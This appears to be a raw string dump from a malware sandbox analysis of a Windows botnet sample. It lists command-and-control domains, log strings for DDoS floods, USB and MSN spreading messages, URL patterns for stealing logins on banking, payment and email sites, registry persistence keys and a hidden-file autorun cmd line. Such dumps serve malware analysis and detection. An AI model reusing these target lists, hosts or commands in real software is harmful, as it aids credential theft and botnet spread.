*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
m1xg.org
m1xg.org
mxxtxxt.biz
mxxtxxt.biz
meob.me
meob.me
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\c1419a97
\\.\pipe\c1419a97
c:\%original file name%.exe
c:\%original file name%.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe
%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe
7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\%original file name%.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>kusadtylds.exe_3336:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>;.tej</pre><pre>()<>@,;:\"[]</pre><pre>mail.hfwjwww10proxiesss.com</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>%c%c%c%c</pre><pre>%d.%d.%d.%d</pre><pre>,.!?-;()[]<></pre><pre>%s %s%0.2d00</pre><pre>%s 0000</pre><pre>%s%0.2d00</pre><pre>(qmail %u by uid %u)</pre><pre>%sd%s.%u.qmail@%s</pre><pre>----=_NextPart_d_X_.8lX..8lX</pre><pre>x.8lx$.8lx$x@%s</pre><pre>0.0.0.0</pre><pre>%s %s</pre><pre>MAIL FROM: <%s></%s></pre><pre>RCPT TO: <%s></%s></pre><pre>to.hex</pre><pre>from.domain</pre><pre>msgid_host</pre><pre>date.imp</pre><pre>date.custom.utc</pre><pre>date.custom_gmt</pre><pre>date.custom</pre><pre>date.utc</pre><pre>qmail_msgid</pre><pre>ol_msgid</pre><pre>hotmail.com; yahoo.com; aol.com; gmail.com; mail.com</pre><pre>v=%s&i=%s&d=%d&m=%d&w=%d</pre><pre>&t=%d</pre><pre>&e=%d</pre><pre>%d:%d;</pre><pre>%d:%d:%s;</pre><pre>http://%s:%d/%s.asp</pre><pre>%s=%s</pre><pre>hotmail.com</pre><pre>yahoo.com</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\</pre><pre>kernel32.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>{CBCDE2F2-CB31-FF5A-6FA1-731547ACF810}</pre><pre>WS2_32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpSendRequestA</pre><pre>WININET.dll</pre><pre>KERNEL32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>MSVCRT.dll</pre><pre>_acmdln</pre><pre>DNSAPI.dll</pre><b>kusadtylds.exe_3336_rwx_00400000_0000B000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>;.tej</pre><pre>()<>@,;:\"[]</pre><pre>mail.hfwjwww10proxiesss.com</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>%c%c%c%c</pre><pre>%d.%d.%d.%d</pre><pre>,.!?-;()[]<></pre><pre>%s %s%0.2d00</pre><pre>%s 0000</pre><pre>%s%0.2d00</pre><pre>(qmail %u by uid %u)</pre><pre>%sd%s.%u.qmail@%s</pre><pre>----=_NextPart_d_X_.8lX..8lX</pre><pre>x.8lx$.8lx$x@%s</pre><pre>0.0.0.0</pre><pre>%s %s</pre><pre>MAIL FROM: <%s></%s></pre><pre>RCPT TO: <%s></%s></pre><pre>to.hex</pre><pre>from.domain</pre><pre>msgid_host</pre><pre>date.imp</pre><pre>date.custom.utc</pre><pre>date.custom_gmt</pre><pre>date.custom</pre><pre>date.utc</pre><pre>qmail_msgid</pre><pre>ol_msgid</pre><pre>hotmail.com; yahoo.com; aol.com; gmail.com; mail.com</pre><pre>v=%s&i=%s&d=%d&m=%d&w=%d</pre><pre>&t=%d</pre><pre>&e=%d</pre><pre>%d:%d;</pre><pre>%d:%d:%s;</pre><pre>http://%s:%d/%s.asp</pre><pre>%s=%s</pre><pre>hotmail.com</pre><pre>yahoo.com</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\</pre><pre>kernel32.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>{CBCDE2F2-CB31-FF5A-6FA1-731547ACF810}</pre><pre>WS2_32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpSendRequestA</pre><pre>WININET.dll</pre><pre>KERNEL32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>MSVCRT.dll</pre><pre>_acmdln</pre><pre>DNSAPI.dll</pre><b>kusadtylds.exe_3336_rwx_00EC0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_3856:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>ole32.dll</pre><pre>ntdll.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>GetProcessHeap</pre><pre>NtOpenKey</pre><pre>svchost.pdb</pre><pre>\PIPE\</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Svchost</pre><pre>\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\</pre><pre>5.1.2600.5512 (xpsp.080413-2111)</pre><pre>svchost.exe</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><b>svchost.exe_3856_rwx_00090000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s 